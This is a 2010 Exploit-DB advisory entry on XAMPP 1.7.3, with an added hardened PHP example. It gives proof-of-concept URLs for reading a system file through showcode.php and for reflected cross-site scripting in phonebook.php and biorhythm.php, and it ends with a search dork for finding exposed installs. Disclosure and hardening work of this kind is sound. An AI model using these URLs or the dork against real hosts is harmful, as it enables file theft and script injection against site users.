Vendor: XAMPP
By: TheLeader
CVSS: 7.5 (HIGH)
Title: File Disclosure & Cross Site Scripting
CWE: 79
Product Name: XAMPP
Affected Version From: 1.7.3
Affected Version To: 1.7.3
Patch Exists: YES
Related CWE: N/A
CPE: a:apache:xampp
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP Hebrew, Service Pack 3
2010

XAMPP <= 1.7.3 multiple vulnerabilities

XAMPP is vulnerable to a remote file disclosure attack. The vulnerability exists within the web application supplied with XAMPP: showcode.php relies on basename($_SERVER['PHP_SELF']) to obtain the path of the file to display. $_SERVER['PHP_SELF'] returns the path of the requested file, and basename() takes the last element of that path, using "/" as the delimiter. Traversing the directory tree, however, requires the "/" character that basename() treats as a delimiter, so directory traversal is not achieved; it is still possible to view file contents from any drive and from the XAMPP htdocs directory.

XAMPP is also vulnerable to a Cross Site Scripting attack. This vulnerability, too, exists within the web application supplied with XAMPP and is caused by the application not properly sanitizing user-supplied input. It can be exploited to execute arbitrary HTML and script code in a user's browser session in the context of an affected site.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to generate unexpected results. Sanitize user input to prevent Cross Site Scripting attacks.
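The following is an added example, not code from XAMPP or from the advisory author. It reproduces why basename($_SERVER['PHP_SELF']) is attacker-influenced (PHP_SELF carries the trailing PATH_INFO segment, SCRIPT_NAME does not) and shows a hardened showcode-style page that allow-lists the file it reads and HTML-encodes the form action; the $_SERVER values, directory and allow-list are constructed for the CLI run.

```php
<?php
// Constructed $_SERVER values mirroring the advisory's request shape.
// PHP_SELF includes PATH_INFO appended after the script, so its basename
// is the attacker-chosen trailing segment; SCRIPT_NAME stops at the script.
$_SERVER['PHP_SELF']    = '/xampp/showcode.php/c:boot.ini';
$_SERVER['SCRIPT_NAME'] = '/xampp/showcode.php';

var_dump(basename($_SERVER['PHP_SELF']));    // the trailing, user-controlled segment
var_dump(basename($_SERVER['SCRIPT_NAME'])); // the real script name

// Hardened source viewer: read only a known demo script from a fixed directory,
// and compare resolved paths so the file cannot be outside that directory.
function safe_source(string $requested, string $baseDir, array $allowed): ?string
{
    if (!in_array($requested, $allowed, true)) {
        return null;                                   // not an allow-listed demo script
    }
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    $root = realpath($baseDir);
    if ($real === false || $root === false
        || strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                                   // resolved outside the intended directory
    }
    return file_get_contents($real);
}

// Hardened form action: derive the name from SCRIPT_NAME (no PATH_INFO) and
// encode it, quotes included, before placing it inside an HTML attribute.
function safe_action(): string
{
    return htmlspecialchars(basename($_SERVER['SCRIPT_NAME']), ENT_QUOTES, 'UTF-8');
}

// Constructed allow-list of the demo scripts the viewer may display.
$allowed = ['biorhythm.php', 'phonebook.php', 'showcode.php'];

// The PATH_INFO-derived name is rejected; this script's own name is served.
var_dump(safe_source(basename($_SERVER['PHP_SELF']), __DIR__, $allowed) === null);
var_dump(safe_source(basename(__FILE__), __DIR__, [basename(__FILE__)]) !== null);

// Even a hostile SCRIPT_NAME segment ends up encoded inside the attribute.
$_SERVER['SCRIPT_NAME'] = '/xampp/"><script>x</script>';
echo '<form method="post" action="' . safe_action() . '">', PHP_EOL;
```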

Exploit-DB raw data:

#     _             ____  __            __    ___ 
#    (_)____ _   __/ __ \/ /_____  ____/ /  _/_/ |
#   / // __ \ | / / / / / //_/ _ \/ __  /  / / / /
#  / // / / / |/ / /_/ / ,< /  __/ /_/ /  / / / / 
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/  / /_/_/  
#                   Live by the byte     |_/_/  
#
# Members:
#
# Pr0T3cT10n
# -=M.o.B.=-
# TheLeader
# Sro
# Debug
#
# Contact: inv0ked.israel@gmail.com
#
# -----------------------------------
#
# Exploit Title: XAMPP <= 1.7.3 multiple vulnerabilities
# Date: 31/10/2010
# Author: TheLeader
# Software Link: http://www.apachefriends.org/en/xampp-windows.html
# Affected Version: 1.7.3 and prior
# Tested on Windows XP Hebrew, Service Pack 3
# ISRAEL, NULLBYTE.ORG.IL
#
# -----------------------------------
 
I. File disclosure

XAMPP is vulnerable to a remote file disclosure attack.
The vulnerability exists within the web application supplied with XAMPP.

http://[host]/xampp/showcode.php/c:boot.ini?showcode=1

showcode.php:
<?php
    echo '<br><br>';
    if ($_REQUEST['showcode'] != 1) {
        echo '<a href="'.$_SERVER['PHP_SELF'].'?showcode=1">'.$TEXT['global-showcode'].'</a>';
    } else {
        $file = file_get_contents(basename($_SERVER['PHP_SELF']));
        echo "<h2>".$TEXT['global-sourcecode']."</h2>";
        echo "<textarea cols='100' rows='10'>";
        echo htmlspecialchars($file);
        echo "</textarea>";
    }
?>

showcode.php relies on basename($_SERVER['PHP_SELF']) to retrieve the path.
What $_SERVER['PHP_SELF'] actually does is retrieve the path of the requested file.
basename() parses the last element of that path using "/" as a delimiter.

Traveling through the directory tree, though, requires the "/" character that is used by basename() as a delimiter.
Therefore directory traveling is not achieved, but it is possible to view file contents from any drive, and the XAMPP htdocs directory.

II. Cross Site Scripting

http://[host]/xampp/phonebook.php/"><script>alert("XSS")</script>
http://[host]/xampp/biorhythm.php/"><script>alert("XSS")</script>

It is interesting to see the same programming error lead to another security vulnerability.
Some PHP scripts in the XAMPP dir rely on $_SERVER['PHP_SELF'] for retrieving the "action" tag for HTML forms.
This can be exploited to perform Cross Site Scripting attacks.

biorhythm.php (line 75):
<form method="post" action="<?php echo basename($_SERVER['PHP_SELF']); ?>">

dork: "inurl:xampp/biorhythm.php"